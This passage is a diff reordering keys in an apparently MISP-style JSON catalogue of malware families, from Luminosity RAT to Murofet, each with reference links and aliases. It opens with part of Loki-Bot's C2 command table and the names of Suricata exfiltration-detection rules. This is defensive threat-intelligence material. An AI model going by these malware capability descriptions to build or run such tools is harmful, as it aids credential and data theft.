infrastructure.\r\n\r\nLoki-Bot can accept the following instructions from the C2 Server:\r\n\r\nBYTE\tINSTRUCTION DESCRIPTION\r\n0x00\tDownload EXE & Execute\r\n0x01\tDownload DLL & Load #1\r\n0x02\tDownload DLL & Load #2\r\n0x08\tDelete HDB File\r\n0x09\tStart Keylogger\r\n0x0A\tMine & Steal Data\r\n0x0E\tExit Loki-Bot\r\n0x0F\tUpgrade Loki-Bot\r\n0x10\tChange C2 Polling Frequency\r\n0x11\tDelete Executables & Exit\r\n\r\nSuricata Signatures\r\nRULE SID\tRULE NAME\r\n2024311\tET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected\r\n2024312\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1\r\n2024313\tET TROJAN Loki Bot Request for C2 Commands Detected M1\r\n2024314\tET TROJAN Loki Bot File Exfiltration Detected\r\n2024315\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1\r\n2024316\tET TROJAN Loki Bot Screenshot Exfiltration Detected\r\n2024317\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2\r\n2024318\tET TROJAN Loki Bot Request for C2 Commands Detected M2\r\n2024319\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2" + "value": "Loki Password Stealer (PWS)" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.luminosity_rat", "https://researchcenter.paloaltonetworks.com/2016/07/unit42-investigating-the-luminositylink-remote-access-trojan-configuration/", @@ -9067,1039 +9069,1037 @@ "https://umbrella.cisco.com/blog/2017/01/18/finding-the-rats-nest/", "http://malwarenailed.blogspot.com/2016/07/luminosity-rat-re-purposed.html", "https://krebsonsecurity.com/2018/07/luminositylink-rat-author-pleads-guilty/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e145863e-f3bd-489c-91f6-0c2b7e9cc59a", - "value": "Luminosity RAT", - "description": "" + "value": "Luminosity RAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lurk", "https://www.secureworks.com/research/malware-analysis-of-the-lurk-downloader" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "929112e4-e252-4273-b3c2-fd414cfb2776", - "value": "Lurk", - "description": "" + "value": "Lurk" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.luzo" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "8c0d3012-9dcb-46d3-964f-8a3c5b58d1b2", - "value": "Luzo", - "description": "" + "value": "Luzo" }, { + "description": "", "meta": { - "synonyms": [ - "Lucky Locker", - "Adneukine", - "Bomba Locker" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lyposit", "https://blog.avast.com/2013/05/20/lockscreen-win32lyposit-displayed-as-a-fake-macos-app/", "http://malware.dontneedcoffee.com/2012/11/inside-view-of-lyposit-aka-for-its.html", "http://malware.dontneedcoffee.com/2013/05/unveiling-locker-bomba-aka-lucky-locker.html" - ] + ], + "synonyms": [ + "Lucky Locker", + "Adneukine", + "Bomba Locker" + ], + "type": [] }, "uuid": "0dea3e9d-b443-40f6-a9e0-ba622850ee8a", - "value": "Lyposit", - "description": "" + "value": "Lyposit" }, { + "description": "", "meta": { - "synonyms": [ - "El Machete" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.machete", "https://securelist.com/el-machete/66108/", "https://www.cylance.com/en_us/blog/el-machete-malware-attacks-cut-through-latam.html", "https://medium.com/@verovaleros/el-machete-what-do-we-know-about-the-apt-targeting-latin-america-be7d11e690e6" - ] + ], + "synonyms": [ + "El Machete" + ], + "type": [] }, "uuid": "9a724a1d-7eb1-4e2b-8cc3-e1b41e8b5cff", - "value": "Machete", - "description": "" + "value": "Machete" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.madmax", "https://www.arbornetworks.com/blog/asert/mad-max-dga/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "42760c2c-bf00-4ace-871c-6dcbbd90b2de", - "value": "MadMax", - "description": "" + "value": "MadMax" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.magala", "https://securelist.com/the-magala-trojan-clicker-a-hidden-advertising-threat/78920/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "192f93bc-fcf6-4aaf-ae2f-d9435a67e48b", - "value": "Magala", - "description": "" + "value": "Magala" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.magniber", "https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/", "https://www.youtube.com/watch?v=lqWJaaofNf4", "http://asec.ahnlab.com/1124" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "fedac411-0638-48dc-8ac5-1b4171fa8a29", - "value": "Magniber", - "description": "" + "value": "Magniber" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.majik_pos", "http://blog.trendmicro.com/trendlabs-security-intelligence/majikpos-combines-pos-malware-and-rats/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c1144eb8-a2bc-48d7-b0fb-18f124c1f8d9", - "value": "MajikPos", - "description": "" + "value": "MajikPos" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.makadocs", "http://contagiodump.blogspot.com/2012/12/nov-2012-backdoorw32makadocs-sample.html", "https://www.symantec.com/connect/blogs/malware-targeting-windows-8-uses-google-docs" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "996e73e9-b093-4987-9992-f52008e55b24", - "value": "Makadocs", - "description": "" + "value": "Makadocs" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.makloader", "https://twitter.com/James_inthe_box/status/1046844087469391872" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "7e088669-3ddb-4cc5-bc9b-ae59f61ada82", - "value": "MakLoader", - "description": "" + "value": "MakLoader" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.maktub", "https://blog.malwarebytes.com/threat-analysis/2016/03/maktub-locker-beautiful-and-dangerous/", "https://bartblaze.blogspot.de/2018/04/maktub-ransomware-possibly-rebranded-as.html", "https://www.intezer.com/iron-cybercrime-group-under-the-scope-2/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "bdb27944-1f79-46f7-a0d7-c344429790c2", - "value": "Maktub", - "description": "" + "value": "Maktub" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.malumpos", "http://documents.trendmicro.com/images/tex/pdf/MalumPOS%20Technical%20Brief.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "159b0dbf-52f6-4690-a545-0f890ba7b9b7", - "value": "MalumPOS", - "description": "" + "value": "MalumPOS" }, { + "description": "", "meta": { - "synonyms": [ - "HDDCryptor", - "DiskCryptor" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mamba", "http://blog.trendmicro.com/trendlabs-security-intelligence/bksod-by-ransomware-hddcryptor-uses-commercial-tools-to-encrypt-network-shares-and-lock-hdds/", "https://securelist.com/the-return-of-mamba-ransomware/79403/" - ] + ], + "synonyms": [ + "HDDCryptor", + "DiskCryptor" + ], + "type": [] }, "uuid": "df320366-7970-4af0-b1f4-9f9492dede53", - "value": "Mamba", - "description": "" + "value": "Mamba" }, { + "description": "", "meta": { - "synonyms": [ - "CryptoHost" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.manamecrypt", "https://www.bleepingcomputer.com/news/security/cryptohost-decrypted-locks-files-in-a-password-protected-rar-file/", "https://www.gdatasoftware.com/blog/2016/04/28234-manamecrypt-a-ransomware-that-takes-a-different-route" - ] + ], + "synonyms": [ + "CryptoHost" + ], + "type": [] }, "uuid": "54cd671e-b7e4-4dd3-9bfa-dc0ba5105944", - "value": "ManameCrypt", - "description": "" + "value": "ManameCrypt" }, { + "description": "", "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mangzamel", + "https://www.hybrid-analysis.com/sample/5d631d77401615d53f3ce3dbc2bfee5d934602dc35d488aa7cebf9b3ff1c4816?environmentId=2" + ], "synonyms": [ "junidor", "mengkite", "vedratve" ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.mangzamel", - "https://www.hybrid-analysis.com/sample/5d631d77401615d53f3ce3dbc2bfee5d934602dc35d488aa7cebf9b3ff1c4816?environmentId=2" - ] + "type": [] }, "uuid": "ed3a94c9-8a5a-4ae7-bdd9-b000e01df3a0", - "value": "Mangzamel", - "description": "" + "value": "Mangzamel" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.manifestus_ransomware", "https://twitter.com/struppigel/status/811587154983981056" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "5b75db42-b8f2-4e52-81d3-f329e49e1af2", - "value": "Manifestus", - "description": "" + "value": "Manifestus" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.manitsme", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "13b0d9ff-0be0-4539-8c86-dfca7a0e79f6", - "value": "ManItsMe", - "description": "" + "value": "ManItsMe" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mapiget", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "8a97307f-a029-4c43-88e1-debed2b80b14", - "value": "MAPIget", - "description": "" + "value": "MAPIget" }, { + "description": "Marap is a downloader, named after its command and control (C&C) phone home parameter \"param\" spelled backwards. It is written in C and contains a few notable anti-analysis features.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.marap", "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-prepare-more-part-1-marap" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c2c3ac24-6921-4bba-a2c8-ac3d364feaeb", - "value": "Marap", - "description": "Marap is a downloader, named after its command and control (C&C) phone home parameter \"param\" spelled backwards. It is written in C and contains a few notable anti-analysis features." + "value": "Marap" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.matrix_banker", "https://www.arbornetworks.com/blog/asert/another-banker-enters-matrix/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "59717468-271e-4d15-859a-130681c17ddb", - "value": "Matrix Banker", - "description": "" + "value": "Matrix Banker" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.matrix_ransom" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "118ced99-5942-497f-885a-2b25d0569b4b", - "value": "Matrix Ransom", - "description": "" + "value": "Matrix Ransom" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.matryoshka_rat", "http://www.clearskysec.com/tulip/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c8a7c6e7-c6d3-4978-8a1d-190162de5e0d", - "value": "Matryoshka RAT", - "description": "" + "value": "Matryoshka RAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.matsnu", "https://blog.checkpoint.com/wp-content/uploads/2015/07/matsnu-malwareid-technical-brief.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f566d597-d0c4-4932-b738-ac5774eedb7a", - "value": "Matsnu", - "description": "" + "value": "Matsnu" }, { + "description": " This ransomware modifies the master boot record of the victim's computer so that it shows a ransom note before Windows starts.", "meta": { - "synonyms": [ - "DexLocker" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mbrlock", "https://www.bleepingcomputer.com/news/security/dexcrypt-mbrlocker-demands-30-yuan-to-gain-access-to-computer/", "https://www.hybrid-analysis.com/sample/dfc56a704b5e031f3b0d2d0ea1d06f9157758ad950483b44ac4b77d33293cb38?environmentId=100", "https://app.any.run/tasks/0a7e643f-7562-4575-b8a5-747bd6b5f02d", "http://id-ransomware.blogspot.com.tr/2018/02/mbrlock-hax-ransomware.html" - ] + ], + "synonyms": [ + "DexLocker" + ], + "type": [] }, "uuid": "41177275-7e6d-4ebd-a4df-d2cc733f7791", - "value": "MBRlock", - "description": " This ransomware modifies the master boot record of the victim's computer so that it shows a ransom note before Windows starts." + "value": "MBRlock" }, { + "description": "", "meta": { - "synonyms": [ - "MyBios" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mebromi", "http://contagiodump.blogspot.com/2011/09/mebromi-bios-rootkit-affecting-award.html", "https://www.symantec.com/connect/blogs/bios-threat-showing-again", "http://www.theregister.co.uk/2011/09/14/bios_rootkit_discovered/", "https://www.webroot.com//blog/2011/09/13/mebromi-the-first-bios-rootkit-in-the-wild/" - ] + ], + "synonyms": [ + "MyBios" + ], + "type": [] }, "uuid": "342be00c-cf68-45a6-8f90-3a2d2d20bda6", - "value": "Mebromi", - "description": "" + "value": "Mebromi" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.medre", "http://contagiodump.blogspot.com/2012/06/medrea-autocad-worm-samples.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "243ae1f7-183e-4ea9-82cf-3353a0ef78f4", - "value": "Medre", - "description": "" + "value": "Medre" }, { + "description": "Medusa is a DDoS bot written in .NET 2.0. In its current incarnation its C&C protocol is based on HTTP, while its predecessor made use of IRC.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.medusa", "https://webcache.googleusercontent.com/search?q=cache:ZbKznF-dogcJ:https://www.toolbase.me/board/topic/10061-b-medusa-irc-ddos-botnet-bypass-cf-cookie-protections/", "https://news.drweb.com/show/?i=10302&lng=en", "https://www.arbornetworks.com/blog/asert/medusahttp-ddos-slithers-back-spotlight/", "https://zerophagemalware.com/2017/10/13/rig-ek-via-malvertising-drops-a-miner/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "237a1c2d-eb14-483d-9a2e-82f10b63ec06", - "value": "win.medusa", - "description": "Medusa is a DDoS bot written in .NET 2.0. In its current incarnation its C&C protocol is based on HTTP, while its predecessor made use of IRC." + "value": "win.medusa" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mewsei" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "48cb12ee-c60a-46cd-b376-39226027c616", - "value": "Mewsei", - "description": "" + "value": "Mewsei" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.miancha", "https://www.contextis.com//documents/30/TA10009_20140127_-_CTI_Threat_Advisory_-_The_Monju_Incident1.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "a3370013-6c47-422e-a4d4-1b86ee71e5e5", - "value": "Miancha", - "description": "" + "value": "Miancha" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.micrass", "https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "6c09cc53-7160-47c6-8df8-3e0d42deb5a6", - "value": "Micrass", - "description": "" + "value": "Micrass" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.microcin", "https://securelist.com/a-simple-example-of-a-complex-cyberattack/82636/", "https://cdn.securelist.com/files/2017/09/Microcin_Technical_4PDF_eng_final_s.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "185d8b28-0179-4ec6-a3c8-201b1936b9aa", - "value": "Microcin", - "description": "" + "value": "Microcin" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.micropsia", "http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/", "http://blog.talosintelligence.com/2017/06/palestine-delphi.html", "https://research.checkpoint.com/apt-attack-middle-east-big-bang/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b37f312f-a0b1-41a9-88ae-da2844c19cae", - "value": "Micropsia", - "description": "" + "value": "Micropsia" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mikoponi" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "87abb59d-0012-4d45-9e75-136372b25bf8", - "value": "Mikoponi", - "description": "" + "value": "Mikoponi" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.milkmaid", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "801d8a6a-b7ba-4557-af5d-1005e53145e2", - "value": "MILKMAID", - "description": "" + "value": "MILKMAID" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mimikatz", "https://github.com/gentilkiwi/mimikatz", " https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", "https://www.wired.com/story/how-mimikatz-became-go-to-hacker-tool/", "http://blog.gentilkiwi.com/securite/un-observateur-evenements-aveugle" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "588fb91d-59c6-4667-b299-94676d48b17b", - "value": "MimiKatz", - "description": "" + "value": "MimiKatz" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.miniasp", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "a4f8bacf-2076-4e00-863c-874cdd833a41", - "value": "MiniASP", - "description": "" + "value": "MiniASP" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirage", "https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "6f6da371-2d62-4245-9aa3-8570e39222ae", - "value": "Mirage", - "description": "" + "value": "Mirage" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.miragefox", "https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b3e89b03-c5af-41cd-88b8-e15335abbb30", - "value": "MirageFox", - "description": "" + "value": "MirageFox" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirai", "https://twitter.com/PhysicalDrive0/status/830070569202749440", "https://securelist.com/blog/research/77621/newish-mirai-spreader-poses-new-risks/", "https://www.incapsula.com/blog/new-mirai-variant-ddos-us-college.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "17e12216-a303-4a00-8283-d3fe92d0934c", - "value": "Mirai", - "description": "" + "value": "Mirai" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.misdat", "https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d1597713-fe7a-45bd-8b59-1a13c7e097d8", - "value": "Misdat", - "description": "" + "value": "Misdat" }, { + "description": "", "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.misfox" + ], "synonyms": [ "MixFox", "ModPack" ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.misfox" - ] + "type": [] }, "uuid": "b4c33277-ec15-4bb3-89ef-314ecfa100da", - "value": "Misfox", - "description": "" + "value": "Misfox" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.miuref" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "4c786624-4a55-46e6-849d-b65552034235", - "value": "Miuref", - "description": "" + "value": "Miuref" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mm_core", "https://blogs.forcepoint.com/security-labs/mm-core-memory-backdoor-returns-bigboss-and-sillygoose" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "6363cc2f-08f1-47a0-adbf-5cf19ea89ffd", - "value": "MM Core", - "description": "" + "value": "MM Core" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mobi_rat", "https://blog.malwarebytes.com/threat-analysis/2017/07/malware-abusing-ffmpeg/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e33aa1f8-a631-4274-afe0-f2fd3426332e", - "value": "MobiRAT", - "description": "" + "value": "MobiRAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mocton" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "7132c1de-9a3f-4f08-955f-ab6f7a09e17d", - "value": "Mocton", - "description": "" + "value": "Mocton" }, { + "description": "", "meta": { - "synonyms": [ - "straxbot" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.modpos", "https://www.fireeye.com/blog/threat-research/2015/11/modpos.html", "https://twitter.com/physicaldrive0/status/670258429202530306" - ] + ], + "synonyms": [ + "straxbot" + ], + "type": [] }, "uuid": "026d638b-cc51-4eff-97fc-d61215a1a70a", - "value": "ModPOS", - "description": "" + "value": "ModPOS" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.moker", "https://breakingmalware.com/malware/moker-part-1-dissecting-a-new-apt-under-the-microscope/", "https://breakingmalware.com/malware/moker-part-2-capabilities/", "http://blog.ensilo.com/moker-a-new-apt-discovered-within-a-sensitive-network", "https://blog.malwarebytes.com/threat-analysis/2017/04/elusive-moker-trojan/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "90a1a61e-3e69-4b92-ac11-9095ac2d9cf4", - "value": "Moker", - "description": "" + "value": "Moker" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mokes", "https://securelist.com/from-linux-to-windows-new-family-of-cross-platform-desktop-backdoors-discovered/73503/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "6d5a5357-4126-4950-b8c3-ee78b1172217", - "value": "Mokes", - "description": "" + "value": "Mokes" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mole", "https://www.proofpoint.com/us/threat-insight/post/adgholas-malvertising-campaign-using-astrum-ek-deliver-mole-ransomware", "https://www.cert.pl/en/news/single/mole-ransomware-analysis-and-decryptor/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "aaeaf9ee-2f3d-4141-9d45-ec383ba8445f", - "value": "Mole", - "description": "" + "value": "Mole" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.molerat_loader", "http://www.clearskysec.com/iec/", "https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/26000/PD26760/en_US/McAfee_Labs_Threat_Advisory_GazaCybergang.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b50408c3-6676-4d3f-8a97-9114c215b67a", - "value": "Molerat Loader", - "description": "" + "value": "Molerat Loader" }, { + "description": "", "meta": { - "synonyms": [ - "CoinMiner" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.monero_miner", "https://www.welivesecurity.com/2017/09/28/monero-money-mining-malware/" - ] + ], + "synonyms": [ + "CoinMiner" + ], + "type": [] }, "uuid": "c57a4168-cd09-4611-a665-bbcede80f42b", - "value": "Monero Miner", - "description": "" + "value": "Monero Miner" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.moonwind", "http://researchcenter.paloaltonetworks.com/2017/03/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "8465177f-16c8-47fc-a4c8-f4c0409fe460", - "value": "MoonWind", - "description": "" + "value": "MoonWind" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.morphine" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "9de41613-7762-4a88-8e9a-4e621a127f32", - "value": "Morphine", - "description": "" + "value": "Morphine" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.morto", "http://contagiodump.blogspot.com/2011/08/aug-28-morto-tsclient-rdp-worm-with.html", "https://www.f-secure.com/weblog/archives/00002227.html", "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Worm:Win32/Morto.A" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c931dc7d-9373-4545-911c-ad5589670c40", - "value": "Morto", - "description": "" + "value": "Morto" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mosquito", "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf", "https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "663df641-d396-4e93-93bd-bb9609ceb0ba", - "value": "Mosquito", - "description": "" + "value": "Mosquito" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.moure" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "bd3468e4-5e00-46e6-a884-6eda1b246394", - "value": "Moure", - "description": "" + "value": "Moure" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mozart", "https://securitykitten.github.io/2015/01/11/the-mozart-ram-scraper.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "dde61acb-8c0f-4a3a-8450-96e233f2ddc1", - "value": "mozart", - "description": "" + "value": "mozart" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mpk", "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "a37c826a-bb30-49fb-952a-63b1cab366c3", - "value": "MPK", - "description": "" + "value": "MPK" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mpkbot", "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "2363dc9f-822a-4581-8d5f-1fc436e70621", - "value": "MPKBot", - "description": "" + "value": "MPKBot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.multigrain_pos", "https://www.fireeye.com/blog/threat-research/2016/04/multigrain_pointo.html", "https://www.pandasecurity.com/mediacenter/malware/multigrain-malware-pos/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c513c490-7c76-42ab-a51f-cc780faa7146", - "value": "Multigrain POS", - "description": "" + "value": "Multigrain POS" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.murkytop", "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "2685ea45-06f4-46e0-9397-eff8844db855", - "value": "murkytop", - "description": "" + "value": "murkytop" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.murofet" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f7081626-130a-48d5-83a9-759b3ef198ec", - "value": "Murofet", - "description": "" + "value": 